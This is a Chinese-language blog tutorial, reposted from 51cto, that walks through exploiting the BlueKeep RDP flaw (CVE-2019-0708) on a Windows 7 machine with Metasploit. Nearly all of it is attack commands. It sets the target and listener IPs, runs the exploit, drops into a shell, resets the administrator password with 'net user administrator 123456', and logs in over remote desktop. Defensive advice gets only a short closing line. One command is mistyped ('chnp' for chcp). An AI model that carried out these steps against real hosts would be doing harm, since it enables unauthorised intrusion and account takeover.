码迷,mamicode.com
首页 > Windows程序 > 详细

白帽子***与网络安全工程师带你:远程桌面漏洞利用与Windows7计算机***实战

时间:2020-10-13 17:29:05      阅读:35      评论:0      收藏:0      [点我收藏+]

标签:设置   计算机   分享   share   使用   乱码   shel   admin   nis   

一、课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
二、战略安排
2.1 打开Metasploit***框架,如下如所示。
命令:msfconsole
技术图片

2.2 检索有关远程桌面的已知漏洞,如下图所示。
命令:search 0708
技术图片

2.3 使用检索到的关于远程桌面的漏洞利用模块,如下图所示。
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
技术图片

2.4 查看***目标需要设置的参数,如下图所示。
命令:show targets
技术图片

2.5 设置相关***参数,如下图所示。
命令:set rhosts 192.168.0.106
set lhost 192.168.0.102
set target 4
技术图片
技术图片

2.6 执行漏洞***模块,如下图所示。
命令:run
技术图片
技术图片

2.7 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。
命令:sysinfo
技术图片

2.8 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。
命令:ipconfig
技术图片

2.9 查看会话命令帮助信息,如下图所示。
命令:?
技术图片

2.10 进入受害者主机cmd界面并解决乱码问题,如下图所示。
命令:shell
chnp 65001
技术图片

2.11 利用“whoami”命令查看相关信息,如下图所示。
命令;whoami
技术图片

2.12 利用cmd命令在受害者主机创建一个新用户,如下图所示。
命令:net user administrator 123456
技术图片

2.13 利用图形化远程桌面登录工具登录受害者主机,如下图所示。
技术图片
技术图片
技术图片

2.14 成功利用图形化远程登录工具拿下目标主机,如下图所示。
技术图片

2.15 远程桌面漏洞防护措施,如下图所示(关闭远程桌面登录服务、开启防火墙、安装第三方电脑管家等等)。
技术图片
技术图片
技术图片
技术图片
技术图片

辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux ***与白帽编程技巧呢!
点我学习更多Kali Linux***测试与网络***实战技巧!

白帽子***与网络安全工程师带你:远程桌面漏洞利用与Windows7计算机***实战

标签:设置   计算机   分享   share   使用   乱码   shel   admin   nis   

原文地址:https://blog.51cto.com/14308022/2541469

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!